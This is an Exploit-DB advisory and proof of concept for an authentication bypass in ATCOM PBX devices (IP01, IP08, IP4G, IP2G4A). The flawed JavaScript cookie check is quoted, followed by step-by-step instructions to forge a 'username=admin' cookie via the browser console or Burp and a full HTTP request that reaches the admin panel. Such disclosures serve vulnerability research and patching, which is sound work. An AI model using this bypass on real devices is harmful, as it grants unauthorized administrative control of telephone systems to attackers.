ATCOM PBX IP01, IP08 , IP4G, IP2G4A - Authentication Bypass

ID EDB-ID:39962
Type exploitdb
Reporter i-Hmx
Modified 2016-06-16T00:00:00


ATCOM PBX IP01, IP08 , IP4G, IP2G4A - Authentication Bypass. Webapps exploit for hardware platform

                                            # Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact :
# Home :
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A

The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
The security check is really stupid , depend on js
affected lines

function alertWithoutLogin(){
    var username = getCookie("username");
        alert('Sorry, permission denied. Please login first!');

so actually it just check if username value exist in cookies
and if not , redirect to login.html
just like that!!!!!!!!!!!!!

just from browser , press f12 , open console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in , simple like that :/

Demo request

GET /admin/index.html HTTP/1.1
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1

From Eg-R1z with love